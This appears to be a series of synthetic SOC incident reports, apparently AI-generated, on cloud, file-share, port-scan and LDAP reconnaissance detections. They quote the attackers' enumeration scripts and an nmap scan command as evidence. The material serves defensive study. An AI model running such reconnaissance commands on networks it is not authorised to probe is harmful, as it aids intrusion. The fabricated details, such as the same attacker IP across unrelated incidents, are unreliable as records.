Confirmed unauthorized discovery API calls
2. Immediate Action
Rotate access keys
AWS IAM
Access keys for svc_ci_cd rotated
3. User Account
Disable temporary credentials
AWS IAM
Credentials revoked
4. IP Blocking
Block attacker IP
AWS WAF, Security Groups
IP 185.143.221[.]89 blocked
5. Impact Assessment
Determine what was discovered
CloudTrail Logs
Attacker enumerated all resources
6. Threat Hunting
Check for other unauthorized access
GuardDuty, CloudTrail
No other suspicious activity
Jira Incident Report
Ticket: SOC-2024-120 Summary: T1580 – Cloud Infrastructure Discovery via Compromised CI/CD Credentials Status: RESOLVED Resolution: MALICIOUS – Credentials Rotated Priority: P2 – MEDIUM Labels: T1580, cloud-discovery, aws, guardduty, compromised-credentials, ci-cd Components: Cloud-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS GuardDuty.
Alert: “Unauthorized API Calls – Cloud Infrastructure Discovery”.
AWS Account: 123456789012 (Production).
IAM User: svc_ci_cd (CI/CD service account).
Source IP: 185.143.221[.]89 (Bulgaria).
Time: 2024-02-23 10:30 EST.
Technique: MITRE ATT&CK T1580 – Cloud Infrastructure Discovery.
2. Technical Analysis:
Attack Chain:
09:30 – CI/CD credentials compromised (source unknown – possibly GitHub leak)
09:45 – Attacker tests credentials from Bulgaria IP
10:15-10:30 – Attacker performs comprehensive discovery
10:30 – GuardDuty detects anomalous pattern
Discovery Performed:
EC2: 47 instances across 3 regions
Security Groups: 84 security groups with rules
VPCs: 12 VPCs with subnets, route tables
S3: 156 buckets with locations
RDS: 23 database instances
Lambda: 78 functions
IAM: 342 users, 156 roles
Total: Full inventory of cloud infrastructure
Credentials Used:
User: svc_ci_cd (CI/CD service account)
Permissions: ReadOnly (by design)
Access Keys: AKIAxxxxxxxxxxxxxxxx (now rotated)
Attacker Intent:
Complete infrastructure mapping
Identifying high-value targets (databases, buckets with sensitive data)
Reconnaissance for future attack
3. Investigation Findings:
Timeline:
09:30 – Credentials compromised
10:15-10:30 – Discovery performed
10:30 – GuardDuty alert
10:32 – SOC investigates
10:35 – Access keys rotated
10:36 – Attacker IP blocked
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
AWS:
– IAM User: svc_ci_cd
– Access Keys: AKIAxxxxxxxxxxxxxxxx (rotated)
API Calls:
– ec2:Describe*, s3:List*, rds:Describe*, iam:List*, lambda:List*
4. Containment Actions:
Immediate Actions:
Rotated access keys for svc_ci_cd.
Revoked any active sessions.
Blocked attacker IP at AWS WAF and security groups.
Impact Assessment:
No write/modify operations performed.
No data accessed (read-only permissions only).
No resources created/modified/deleted.
Credential Leak Investigation:
Found CI/CD credentials in public GitHub repo (developer mistake).
Repo made private; credentials removed.
Developer counseled.
5. Root Cause Analysis:
Primary Cause: CI/CD credentials leaked in public GitHub repository.
Contributing Factors:
No secret scanning in place.
Developer unaware of credential exposure.
Service account had broad read-only access.
6. Business Impact:
Operational Impact: None.
Security Impact: Full infrastructure inventory exposed to attacker.
Reputational Impact: Internal only.
7. Remediation & Prevention:
Completed Actions:
Credentials rotated.
Attacker blocked.
GitHub repo secured.
Technical Controls Enhanced:
Implemented secret scanning (GitHub Advanced Security).
Enforced MFA for all AWS users (including service accounts? – not possible, but added guardrails).
Restricted service account permissions to least privilege.
Deployed GuardDuty with automated response.
8. Conclusion:
An attacker discovered CI/CD credentials in a public GitHub repository and used them to perform comprehensive discovery of our AWS infrastructure. GuardDuty detected the anomalous API calls from an unusual location. Credentials were rotated before any write operations could occur.
Closure Rationale: Credentials rotated; attacker blocked; secret scanning implemented.
Analyst: [Walter White], SOC Analyst Date: 2024-02-23 11:30 EST
End of Batch 16
Ready for your next batch of prompts whenever you are.
Batch 17: Discovery & Cloud Reconnaissance Incident Reports
Here are the next 5 detailed SOC incident reports.
81. T1538 – Cloud Service Dashboard Discovery (Azure AD Detection)
Azure AD Alert Details
Alert ID: AAD-CLOUD-DASHBOARD-1538-7842 Alert Time: 2024-02-24 09:30:15 EST Severity: HIGH (85/100) Source: Azure AD Identity Protection + Cloud App Security Rule: “Unusual Azure Portal Access – Privileged Account Reconnaissance” MITRE ATT&CK: T1538 – Cloud Service Dashboard Discovery
Alert Details:
Detection: Privileged account accessing multiple Azure management areas from unusual location
User: jwilson@company.com (Global Administrator) Source IP: 185.143.221[.]89 (Bulgaria) Time: 09:15-09:30 EST
Azure Portal Activity:
09:15:22 – Login to Azure Portal (successful)
09:15:45 – Navigated to “Subscriptions” blade (viewed all subscriptions)
09:16:12 – Navigated to “Resource Groups” (listed all resource groups)
09:16:38 – Navigated to “Virtual Machines” (viewed all VMs)
09:17:05 – Navigated to “SQL Databases” (viewed all databases)
09:17:33 – Navigated to “Storage Accounts” (listed all storage)
09:18:01 – Navigated to “Key Vaults” (viewed vault list)
09:18:28 – Navigated to “Azure AD Users” (exported user list)
09:19:15 – Navigated to “Azure AD Roles and Administrators”
09:19:45 – Navigated to “Enterprise Applications”
09:20:12 – Navigated to “Conditional Access Policies”
09:20:38 – Navigated to “Activity Log” (viewed recent changes)
09:21:00 – Signed out
Detection Logic:
User jwilson is Global Admin (highly privileged)
Normal access location: New York, USA
Current location: Bulgaria (impossible travel)
Access pattern: Systematic review of all Azure areas (reconnaissance)
No configuration changes made (view-only)
Pattern matches adversary discovery phase
Additional Context:
jwilson is a cloud architect
Account MFA: Enabled (but approved from Bulgaria?)
User reported MFA request at 09:15 (did NOT approve)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Azure AD alert
Azure AD Identity Protection
Confirmed suspicious Azure portal access
2. MFA Investigation
Check MFA approval
Azure AD Sign-in Logs
MFA approved from Bulgaria (token theft?)
3. Immediate Action
Disable account
Azure AD, Active Directory
jwilson account disabled
4. Session Termination
Revoke all sessions
Azure AD PowerShell
All sessions terminated
5. Token Revocation
Revoke refresh tokens
Azure AD
All tokens invalidated
6. Password Reset
Reset user password
Azure AD
Password reset; MFA re-enrolled
Jira Incident Report
Ticket: SOC-2024-121 Summary: T1538 – Azure Portal Reconnaissance by Compromised Global Admin Status: RESOLVED Resolution: MALICIOUS – Account Secured Priority: P1 – CRITICAL Labels: T1538, cloud-discovery, azure-portal, azure-ad, compromised-admin Components: Cloud-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Azure AD Identity Protection + Cloud App Security.
Alert: “Unusual Azure Portal Access – Privileged Account Reconnaissance”.
User: jwilson@company.com (Global Administrator).
Source IP: 185.143.221[.]89 (Bulgaria).
Time: 2024-02-24 09:30 EST.
Technique: MITRE ATT&CK T1538 – Cloud Service Dashboard Discovery.
2. Technical Analysis:
Attack Chain:
09:00 – Attacker obtains jwilson’s credentials (phishing)
09:15 – Attacker logs into Azure Portal from Bulgaria
09:15 – MFA push sent to user’s phone
09:15 – User did NOT approve (investigation ongoing: token theft possible)
09:15-09:21 – Attacker accesses Azure Portal (MFA somehow bypassed)
09:21 – Attacker signs out
09:30 – Azure AD detects anomaly
MFA Bypass Theory:
Session token theft from earlier legitimate session
Attacker used stolen token to access portal without MFA
User reported MFA request but did not approve
Token theft most likely vector
Resources Discovered:
Subscriptions: 3 production subscriptions identified
Resource Groups: 47 groups across subscriptions
Virtual Machines: 86 VMs (including 12 domain controllers)
SQL Databases: 23 databases (including customer data)
Storage Accounts: 34 accounts (including backups)
Key Vaults: 8 vaults (secrets/certificates)
Azure AD Users: 3,247 users exported
Admin Roles: 12 Global Admins identified
Conditional Access: Full policy visibility
Attacker Intent:
Complete Azure infrastructure mapping
Identifying high-value targets (Key Vaults, SQL, Domain Controllers)
Reconnaissance for ransomware or data theft
3. Investigation Findings:
Timeline:
09:00 – Credentials compromised
09:15-09:21 – Attacker reconnaissance
09:21 – Attacker exits
09:30 – Alert triggers
09:32 – SOC investigates
09:35 – Account disabled
09:36 – Sessions terminated
09:37 – Tokens revoked
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Azure:
– User: jwilson@company.com
– Sign-in log ID: 7842-1234-5678-9012 (anomalous)
MFA:
– Push request at 09:15 (user declined)
4. Containment Actions:
Immediate Actions:
Disabled jwilson account.
Revoked all active sessions.
Revoked all refresh tokens.
Reset user password.
Re-enrolled MFA.
Azure-Wide Actions:
Reviewed all admin activity (no changes made).
Rotated any exposed secrets (precautionary).
Audited Conditional Access policies.
User Remediation:
jwilson briefed on token theft risks.
New laptop provisioned (potential compromise).
5. Root Cause Analysis:
Primary Cause: Credential compromise (phishing) combined with token theft.
Contributing Factors:
Session tokens not bound to device/location.
Admin account had excessive privileges.
No anomaly detection for token replay.
6. Business Impact:
Operational Impact: Global Admin offline for 2 hours.
Security Impact: Full Azure infrastructure inventory exposed.
Data Exposure: User list exported; no data accessed.
7. Remediation & Prevention:
Completed Actions:
Account secured.
Tokens revoked.
Sessions terminated.
Technical Controls Enhanced:
Enforced token protection (conditional access token binding).
Reduced Global Admin count (JIT access only).
Implemented Privileged Identity Management (PIM) for admins.
Enhanced Azure AD Identity Protection alerts.
8. Conclusion:
An attacker compromised a Global Admin account and performed comprehensive reconnaissance of our Azure infrastructure via the portal. Azure AD detected the anomalous access pattern and triggered an alert. The account was secured before any changes could be made.
Closure Rationale: Account secured; tokens revoked; Azure inventory exposed but unchanged.
Analyst: [Walter White], SOC Analyst Date: 2024-02-24 10:30 EST
82. T1083 – File and Directory Discovery (Varonis Detection)
Varonis Alert Details
Alert ID: VARONIS-FILE-DISCOVERY-1083-7842 Alert Time: 2024-02-24 14:15:33 EST Severity: HIGH (82/100) Source: Varonis Data Security Platform Rule: “Mass File Enumeration – Potential Data Harvesting” MITRE ATT&CK: T1083 – File and Directory Discovery
Alert Details:
Detection: User accessing unusually high number of files/folders across multiple shares
User: bturner@company.com (Brian Turner, Finance) Source Host: FIN-WS-078 Time: 14:00-14:15 EST
File Access Events:
14:00:15 – Accessed \filesrv\finance\ (folder listing) – 1,247 files
14:01:22 – Accessed \filesrv\finance\Q1_Reports\ – 342 files
14:02:45 – Accessed \filesrv\finance\Q2_Reports\ – 356 files
14:04:12 – Accessed \filesrv\finance\Q3_Reports\ – 351 files
14:05:38 – Accessed \filesrv\finance\Q4_Reports\ – 348 files
14:07:05 – Accessed \filesrv\hr\payroll\ (unusual for this user) – 234 files
14:08:33 – Accessed \filesrv\executive\board_meetings\ – 87 files
14:10:12 – Accessed \filesrv\it\passwords\ (highly sensitive) – 12 files
14:12:45 – Accessed \filesrv\r&d\projects\ – 567 files
14:14:30 – Accessed \filesrv\legal\contracts\ – 189 files
Total Files Accessed: 3,733 files in 15 minutes (normal is 50-100 per day)
File Types of Interest:
.xlsx (Excel financials) – 847 files
.pdf (reports, contracts) – 1,234 files
.docx (documents) – 892 files
.txt (notes, passwords) – 47 files
.kdbx (KeePass database) – 3 files (CRITICAL)
Detection Logic:
3,733 files accessed in 15 minutes (37x normal)
Access spans multiple shares (Finance, HR, Executive, IT, R&D, Legal)
User bturner normally only accesses Finance share
Process: Windows Explorer + custom script (cmd.exe with dir commands)
Pattern matches data harvesting for exfiltration
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Varonis alert
Varonis Console
Confirmed mass file enumeration
2. Process Investigation
Identify process on FIN-WS-078
CrowdStrike Falcon
Found dir_scan.bat script enumerating shares
3. Immediate Action
Isolate host
CrowdStrike
FIN-WS-078 quarantined
4. Script Analysis
Analyze dir_scan.bat
Manual review
Script automates directory listing of all shares
5. User Interview
Contact bturner
Teams, Phone
User did NOT run this script (account compromised)
6. Account Remediation
Reset password, disable account
Azure AD, AD
bturner account disabled
Jira Incident Report
Ticket: SOC-2024-122 Summary: T1083 – Mass File Enumeration Across Multiple Shares Status: RESOLVED Resolution: MALICIOUS – Account Compromised Priority: P2 – MEDIUM Labels: T1083, file-discovery, enumeration, varonis, compromised-account Components: Data-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Varonis Data Security Platform.
Alert: “Mass File Enumeration – Potential Data Harvesting”.
User: bturner@company.com (Finance Department).
Source Host: FIN-WS-078.
Time: 2024-02-24 14:15 EST.
Technique: MITRE ATT&CK T1083 – File and Directory Discovery.
2. Technical Analysis:
Attack Chain:
13:45 – bturner account credentials compromised via phishing
13:50 – Attacker logs into FIN-WS-078 via RDP
13:55 – Attacker creates dir_scan.bat script
14:00-14:15 – Script enumerates files across all network shares
14:15 – Varonis detects anomaly
14:17 – SOC investigates
Script Analysis:
File: C:\Users\bturner\Desktop\dir_scan.bat
Content:
@echo off
dir \\filesrv\finance\*.* /s /w > C:\temp\finance.txt
dir \\filesrv\hr\*.* /s /w > C:\temp\hr.txt
dir \\filesrv\executive\*.* /s /w > C:\temp\exec.txt
dir \\filesrv\it\*.* /s /w > C:\temp\it.txt
dir \\filesrv\r&d\*.* /s /w > C:\temp\rd.txt
dir \\filesrv\legal\*.* /s /w > C:\temp\legal.txt
dir \\filesrv\shared\*.* /s /w > C:\temp\shared.txt
Purpose: Create inventory of all files on network shares
Files of Critical Interest:
IT Share: passwords.txt (plaintext service account passwords)
IT Share: network_diagrams.pdf (infrastructure details)
Executive Share: board_meeting_minutes_q1.docx (confidential)
R&D Share: source_code_backup.zip (intellectual property)
Legal Share: contracts_with_vendors.xlsx (financial agreements)
Attacker Actions After Enumeration:
Created inventory files in C:\temp
No exfiltration yet (detected before)
Preparing for data theft
3. Investigation Findings:
Timeline:
13:45 – Credentials compromised
13:50 – RDP access
13:55 – Script created
14:00-14:15 – Enumeration
14:15 – Varonis alert
14:17 – SOC investigates
14:20 – Host isolated
14:21 – Account disabled
14:22 – RDP session terminated
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\Desktop\dir_scan.bat
– C:\temp\*.txt (inventory files)
Account:
– bturner (compromised)
Network:
– Attacker RDP IP: 45.134.225[.]78
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-078 via CrowdStrike.
Disabled bturner account.
Terminated RDP session.
Deleted dir_scan.bat and inventory files.
Data Protection:
Reviewed sensitive files accessed.
No exfiltration detected (DLP logs).
Rotated passwords exposed in IT share.
User Remediation:
bturner password reset.
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User credentials compromised via phishing.
Contributing Factors:
No MFA on finance account.
RDP allowed from internet.
Sensitive files accessible to finance user (over-privileged).
6. Business Impact:
Operational Impact: Finance user offline for 2 hours.
Data Exposure: Sensitive file inventory created but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Account secured.
Host cleaned.
Sensitive files secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted file share permissions (least privilege).
Enhanced Varonis monitoring for enumeration patterns.
8. Conclusion:
An attacker compromised a finance user’s account and performed mass file enumeration across multiple network shares, creating an inventory of sensitive files. Varonis detected the anomalous access pattern before exfiltration could occur.
Closure Rationale: Account secured; enumeration stopped; data contained.
Analyst: [Walter White], SOC Analyst Date: 2024-02-24 15:30 EST
83. T1046 – Network Service Discovery (ExtraHop Detection)
ExtraHop Alert Details
Alert ID: EXTRAHOP-SERVICE-SCAN-1046-7842 Alert Time: 2024-02-24 11:30:22 EST Severity: MEDIUM (72/100) Source: ExtraHop Reveal(x) Rule: “Internal Port Scan – Horizontal Movement Detected” MITRE ATT&CK: T1046 – Network Service Discovery
Alert Details:
Detection: Horizontal port scan originating from internal host
Source Host: 192.168.45.78 (DEV-WS-045 – Engineering) Time Window: 11:15-11:30 EST Scan Pattern: TCP SYN scan across multiple subnets
Scan Details:
Target Range: 192.168.0.0/16 (entire internal network)
Ports Scanned: 22 (SSH), 80 (HTTP), 443 (HTTPS), 445 (SMB), 3389 (RDP), 3306 (MySQL), 5432 (PostgreSQL), 8080 (HTTP-Alt), 8443 (HTTPS-Alt)
Total Packets: 12,847
Unique Targets: 847 hosts
Successful Connections: 124 hosts (responded to scan)
Discovered Services:
SSH (22): 47 hosts (including 12 Linux servers)
SMB (445): 89 hosts (file servers, workstations)
RDP (3389): 34 hosts (potential lateral movement targets)
MySQL (3306): 12 hosts (database servers)
PostgreSQL (5432): 8 hosts
HTTP/HTTPS: 56 hosts
Detection Logic:
12,847 SYN packets in 15 minutes (anomalous for this host)
Sequential scanning pattern (nmap/masscan)
Host DEV-WS-045 normally generates minimal network traffic
Process: cmd.exe launching nmap (from EDR logs)
Pattern matches adversary lateral movement preparation
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify ExtraHop alert
ExtraHop Console
Confirmed internal port scan
2. Process Investigation
Identify scanning process
CrowdStrike Falcon
nmap.exe running from user’s Downloads folder
3. User Interview
Contact dev user
Teams, Phone
User claims “security research” – unauthorized
4. Immediate Action
Isolate host
CrowdStrike
DEV-WS-045 quarantined
5. Tool Removal
Delete nmap
CrowdStrike Live Response
nmap.exe and scan results removed
6. User Remediation
User counseling
Manager, HR
Policy violation documented
Jira Incident Report
Ticket: SOC-2024-123 Summary: T1046 – Internal Network Service Scan from Engineering Workstation Status: RESOLVED Resolution: POLICY VIOLATION – Unauthorized Scanning Priority: P3 – LOW Labels: T1046, service-discovery, port-scan, extrahop, policy-violation Components: Network-Security, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: ExtraHop Reveal(x).
Alert: “Internal Port Scan – Horizontal Movement Detected”.
Source Host: DEV-WS-045 (Engineering Department, IP 192.168.45.78).
Time: 2024-02-24 11:30 EST.
Technique: MITRE ATT&CK T1046 – Network Service Discovery.
2. Technical Analysis:
Scan Details:
Tool: nmap.exe (version 7.94)
Command: nmap -sS -p 22,80,443,445,3389,3306,5432,8080,8443 192.168.0.0/16
Duration: 15 minutes
Packets: 12,847
Targets: 847 hosts
Successes: 124 responsive hosts
Discovered Services:
SSH (22): 47 hosts (including 12 Linux servers)
SMB (445): 89 hosts (file servers, workstations)
RDP (3389): 34 hosts (potential lateral movement targets)
MySQL (3306): 12 hosts (database servers)
PostgreSQL (5432): 8 hosts
HTTP/HTTPS: 56 hosts
User Intent:
User claimed “researching network security for a presentation”
No malicious intent identified
No authorization obtained for scanning
Scan results saved to C:\Users\devuser\Desktop\scan_results.txt
Policy Violation:
Unauthorized network scanning (violates Acceptable Use Policy)
Use of prohibited tools (nmap)
Discovery of internal services could aid attackers
3. Investigation Findings:
Timeline:
11:15-11:30 – Scan performed
11:30 – ExtraHop alert
11:32 – SOC investigates
11:35 – Host isolated
11:38 – nmap identified and removed
11:40 – User interview
Indicators of Compromise (IoCs):
Files:
– C:\Users\devuser\Downloads\nmap-7.94-setup.exe
– C:\Program Files (x86)\Nmap\nmap.exe
– C:\Users\devuser\Desktop\scan_results.txt
Network:
– Scan pattern to ports 22,80,443,445,3389,3306,5432,8080,8443
4. Containment Actions:
Immediate Actions:
Isolated DEV-WS-045 via CrowdStrike.
Removed nmap and scan results.
No further action needed (non-malicious).
User Remediation:
User counseled on policy violation.
Required to complete security training.
Documentation sent to manager.
Network Impact:
Scan caused no service disruption.
Discovered services documented for security team.
5. Root Cause Analysis:
Primary Cause: User conducted unauthorized network scanning.
Contributing Factors:
No application control blocking nmap.
User unaware of scanning policy.
Curiosity about network security.
6. Business Impact:
Operational Impact: None.
Security Impact: Internal service inventory exposed to user (already had access).
Policy Impact: Policy violation documented.
7. Remediation & Prevention:
Completed Actions:
nmap removed.
User educated.
Policy reinforced.
Technical Controls Enhanced:
Created alert for nmap execution.
Enhanced network scanning detection.
Blocked nmap via application control.
8. Conclusion:
An engineer conducted unauthorized network scanning using nmap, discovering 124 internal hosts and their services. ExtraHop detected the scan pattern, enabling identification and removal of the tool. The activity was a policy violation, not malicious.
Closure Rationale: nmap removed; user educated; policy violation documented.
Analyst: [Walter White], SOC Analyst Date: 2024-02-24 12:30 EST
84. T1135 – Network Share Discovery (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-SHARE-DISCOVERY-1135-7842 Alert Time: 2024-02-24 16:30:45 EST Severity: MEDIUM (68/100) Source: Splunk Enterprise Security Rule: “Multiple Network Share Enumeration Attempts” MITRE ATT&CK: T1135 – Network Share Discovery
Alert Details:
Correlated Events:
Windows Event ID 5140 (Network Share Object Accessed):
Time: 16:15-16:30 EST
Source Host: HR-WS-023 (HR Workstation)
User: kwilson@company.com (HR Generalist)
Target: \filesrv\ (multiple shares)
Events: 47 share access attempts
Shares Accessed:
\filesrv\finance – accessed (unusual for HR)
\filesrv\it – accessed
\filesrv\executive – accessed
\filesrv\r&d – accessed
\filesrv\legal – accessed
\filesrv\hr – accessed (normal)
\filesrv\shared – accessed
\filesrv\backups – accessed
Process Creation (Event ID 4688):
Time: 16:14 EST
Process: cmd.exe
Command: net view \filesrv /all
Command: dir \filesrv*.* /s
Event ID 5145 (Share Access):
Time: 16:15-16:30
Detailed access to subfolders within shares
Detection Logic:
User kwilson (HR) accessing finance, IT, R&D shares (anomalous)
47 share access events in 15 minutes (high volume)
net view command executed (share discovery tool)
Pattern matches lateral movement reconnaissance
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Splunk correlation
Splunk ES
Confirmed network share discovery
2. Process Investigation
Identify process on HR-WS-023
CrowdStrike Falcon
Found PowerShell script enumerating shares
3. User Interview
Contact kwilson
Teams, Phone
User did NOT perform this activity
4. Immediate Action
Isolate host
CrowdStrike
HR-WS-023 quarantined
5. Account Remediation
Disable kwilson account
Azure AD, AD
Account disabled
6. Threat Hunting
Check for similar activity
Splunk, CrowdStrike
No other hosts affected
Jira Incident Report
Ticket: SOC-2024-124 Summary: T1135 – Network Share Discovery from HR Workstation Status: RESOLVED Resolution: MALICIOUS – Account Compromised Priority: P2 – MEDIUM Labels: T1135, share-discovery, network-shares, splunk, compromised-account Components: Data-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Multiple Network Share Enumeration Attempts”.
Source Host: HR-WS-023 (HR Department).
User: kwilson@company.com (HR Generalist).
Time: 2024-02-24 16:30 EST.
Technique: MITRE ATT&CK T1135 – Network Share Discovery.
2. Technical Analysis:
Attack Chain:
15:45 – kwilson account credentials compromised (phishing)
15:50 – Attacker logs into HR-WS-023 via RDP
16:00 – Attacker runs PowerShell script for share discovery
16:05-16:30 – Script enumerates all network shares
16:30 – Splunk detects anomaly
Script Analysis:
File: C:\Users\kwilson\AppData\Local\Temp\enum.ps1
Content:
$shares = net view \\filesrv /all
foreach ($share in $shares) {
$path = “\\filesrv\” + $share
dir $path -Recurse -ErrorAction SilentlyContinue
$path >> C:\temp\share_contents.txt
}
Purpose: Enumerate all shares and list their contents
Shares Discovered:
Finance: 1,247 files (financial reports, budgets)
IT: 3,456 files (network diagrams, passwords, configs)
Executive: 234 files (board minutes, strategy docs)
R&D: 5,678 files (source code, designs)
Legal: 892 files (contracts, IP documents)
HR: 1,234 files (employee records, salaries)
Backups: 12,345 files (full system backups)
Attacker Actions After Discovery:
Created inventory file (C:\temp\share_contents.txt)
No exfiltration yet (detected before)
Preparing for data theft
3. Investigation Findings:
Timeline:
15:45 – Credentials compromised
15:50 – RDP access
16:00-16:30 – Share enumeration
16:30 – Splunk alert
16:32 – SOC investigates
16:35 – Host isolated
16:36 – Account disabled
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\enum.ps1
– C:\temp\share_contents.txt
Account:
– kwilson (compromised)
Network:
– Attacker RDP IP: 185.143.221[.]89
4. Containment Actions:
Immediate Actions:
Isolated HR-WS-023 via CrowdStrike.
Disabled kwilson account.
Terminated RDP session.
Deleted enum.ps1 and share_contents.txt.
Data Protection:
Reviewed sensitive files discovered.
No exfiltration detected (DLP logs).
Rotated any exposed credentials.
User Remediation:
kwilson password reset.
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User credentials compromised via phishing.
Contributing Factors:
No MFA on HR account.
RDP allowed from internet.
HR account had broad access to network shares (over-privileged).
6. Business Impact:
Operational Impact: HR user offline for 2 hours.
Data Exposure: Full share inventory created but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Account secured.
Host cleaned.
Share inventory deleted.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted share permissions (least privilege).
Enhanced monitoring for share enumeration.
8. Conclusion:
An attacker compromised an HR user’s account and performed comprehensive network share discovery, creating an inventory of sensitive files across multiple departments. Splunk detected the anomalous access pattern before exfiltration could occur.
Closure Rationale: Account secured; enumeration stopped; data contained.
Analyst: [Walter White], SOC Analyst Date: 2024-02-24 17:30 EST
85. T1018 – Remote System Discovery (Darktrace Detection)
Darktrace Alert Details
Alert ID: DARKTRACE-REMOTE-DISCOVERY-1018-7842 Alert Time: 2024-02-24 10:30:22 EST Severity: MEDIUM (72/100) Source: Darktrace Enterprise Immune System Rule: “LDAP Query Anomaly – Potential Domain Reconnaissance” MITRE ATT&CK: T1018 – Remote System Discovery
Alert Details:
Detection: Unusual volume of LDAP queries from single host
Source Host: 192.168.45.78 (ENG-WS-045 – Engineering) Time: 10:15-10:30 EST LDAP Queries: 1,247 in 15 minutes (normal is 10-20)
Query Patterns:
10:15:15 – Query: (objectClass=computer) – list all computers
10:15:45 – Query: (&(objectClass=computer)(operatingSystem=server)) – find servers
10:16:12 – Query: (&(objectClass=computer)(operatingSystem=domain controller)) – find DCs
10:16:38 – Query: (cn=sql) – find SQL servers
10:17:05 – Query: (cn=exchange) – find Exchange servers
10:17:33 – Query: (cn=filesrv) – find file servers
10:18:01 – Query: (cn=print) – find print servers
10:18:28 – Query: (cn=vcenter) – find vCenter servers
10:19:15 – Query: (cn=esxi) – find ESXi hosts
(continuing with various system naming patterns)
Results Discovered:
Total Computers: 3,247
Domain Controllers: 4
SQL Servers: 23
Exchange Servers: 2
File Servers: 47
Print Servers: 12
Virtualization Hosts: 8
Detection Logic:
1,247 LDAP queries in 15 minutes (highly anomalous)
Process: powershell.exe (using ADSI)
Query patterns targeting specific system types
Pattern matches adversary remote system discovery
Additional Context:
Host ENG-WS-045 is engineering workstation
User: alexchen (engineer)
No legitimate reason for LDAP reconnaissance
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Darktrace alert
Darktrace Console
Confirmed LDAP reconnaissance
2. Process Investigation
Identify PowerShell script
CrowdStrike Falcon
Found Active Directory reconnaissance script
3. User Interview
Contact alexchen
Teams, Phone
User claims “learning PowerShell” – unauthorized
4. Immediate Action
Isolate host temporarily
CrowdStrike
ENG-WS-045 isolated
5. Script Removal
Delete reconnaissance script
CrowdStrike Live Response
Script removed from Downloads folder
6. User Remediation
User counseling
Manager, HR
Policy violation documented
Jira Incident Report
Ticket: SOC-2024-125 Summary: T1018 – LDAP Reconnaissance for Remote System Discovery Status: RESOLVED Resolution: POLICY VIOLATION – Unauthorized Reconnaissance Priority: P3 – LOW Labels: T1018, remote-discovery, ldap, darktrace, policy-violation Components: Identity-Monitoring, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “LDAP Query Anomaly – Potential Domain Reconnaissance”.
Source Host: ENG-WS-045 (Engineering Department, IP 192.168.45.78).
User: alexchen@company.com (Engineer).
Time: 2024-02-24 10:30 EST.
Technique: MITRE ATT&CK T1018 – Remote System Discovery.
2. Technical Analysis:
Reconnaissance Details:
Tool: PowerShell script using ADSI (Active Directory Service Interfaces)
Commands:
$searcher = New-Object DirectoryServices.DirectorySearcher([ADSI]”LDAP://company.com”)
$searcher.PageSize = 1000
# Find all computers
$searcher.Filter = “(objectClass=computer)”
$computers = $searcher.FindAll()
# Find servers by OS
$searcher.Filter = “(&(objectClass=computer)(operatingSystem=*server*))”
$servers = $searcher.FindAll()
# Find specific systems
$sqlServers = Get-ADComputer -Filter {Name -like “*sql*”}
$exchangeServers = Get-ADComputer -Filter {Name -like “*exchange*”}
# … and so on
Purpose: Comprehensive inventory of all systems in domain
Systems Discovered:
Total Computers: 3,247 (all workstations, servers)
Domain Controllers: 4 (critical infrastructure)
SQL Servers: 23 (database servers)
Exchange Servers: 2 (email servers)
File Servers: 47 (data storage)
Virtualization Hosts: 8 (VMware ESXi)
User Intent:
User claimed “learning PowerShell for automation”
No malicious intent identified
No authorization for domain-wide reconnaissance
Results saved to C:\Users\alexchen\Desktop\systems.txt
Policy Violation:
Unauthorized domain reconnaissance
Use of discovery techniques without approval
Discovery of critical systems could aid attackers
3. Investigation Findings:
Timeline:
10:15-10:30 – Reconnaissance performed
10:30 – Darktrace alert
10:32 – SOC investigates
10:35 – Host isolated
10:38 – Script identified and removed
10:40 – User interview
Indicators of Compromise (IoCs):
Files:
– C:\Users\alexchen\Downloads\ad_recon.ps1
– C:\Users\alexchen\Desktop\systems.txt
LDAP:
– 1,247 queries in 15 minutes
– Patterns: *server*, *sql*, *exchange*, *dc*, *filesrv*
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 temporarily.
Removed ad_recon.ps1 and systems.txt.
No further action needed (non-malicious).
User Remediation:
User counseled on policy violation.
Required to complete security training.
Documentation sent to manager.
Network Impact:
LDAP queries caused no performance issues.
Discovery data documented for security awareness.
5. Root Cause Analysis:
Primary Cause: User conducted unauthorized domain reconnaissance.
Contributing Factors:
No restrictions on LDAP queries.
User unaware of reconnaissance policy.
Curiosity about Active Directory.
6. Business Impact:
Operational Impact: None.
Security Impact: System inventory exposed to user (already had legitimate access).
Policy Impact: Policy violation documented.
7. Remediation & Prevention:
Completed Actions:
Reconnaissance script removed.
User educated.
Policy reinforced.
Technical Controls Enhanced:
Created alert for high-volume LDAP queries.
Enhanced monitoring for AD reconnaissance.
Implemented application control for unauthorized scripts.
8. Conclusion:
An engineer conducted unauthorized LDAP reconnaissance to discover all systems in the domain, including critical infrastructure. Darktrace detected the anomalous query volume, enabling identification and removal of the script. The activity was a policy violation, not malicious.
